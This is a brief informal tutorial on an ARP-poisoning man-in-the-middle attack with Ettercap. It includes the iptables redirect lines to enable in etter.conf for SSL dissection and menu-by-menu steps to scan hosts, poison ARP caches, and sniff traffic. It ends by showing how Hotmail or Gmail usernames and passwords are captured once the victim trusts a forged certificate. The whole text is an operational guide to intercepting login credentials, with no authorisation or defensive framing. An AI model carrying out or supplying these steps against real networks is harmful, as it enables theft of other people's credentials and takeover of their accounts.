Simple Sniffing Tutorial



1. For SSL Dissection support (hotmail,gmail), you need to do this:
Open a shell, type: "nano /usr/local/etc/etter.conf", use the down arrow until you reach "redir_command_on/off", look at the linux part, your gonna need to uncomment:
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
after your done, press F2, Y, Return.

Now boot Ettercap: Menu --> Backtrack --> Spoofing --> Ettercap
Go to: Sniff --> Unified Sniffing -->ethX(what interface you want to sniff).
Then Press: Ctrl+S to scan hosts.
Then Go to: Mitm --> ARP poisoning, select sniff remote connections, and press ok.
Then Go to: Start --> Start Sniffing.

For an Example, Walk to another pc, go to your internet email account (Hotmail, Gmail), and log in, you will be asked to trust the certificate, Trust it, and watch your sniffing computer, the username and password should appear.

When your done, go to Start --> Stop Sniffing, And go to Mitm --> Stop mitm attack(s)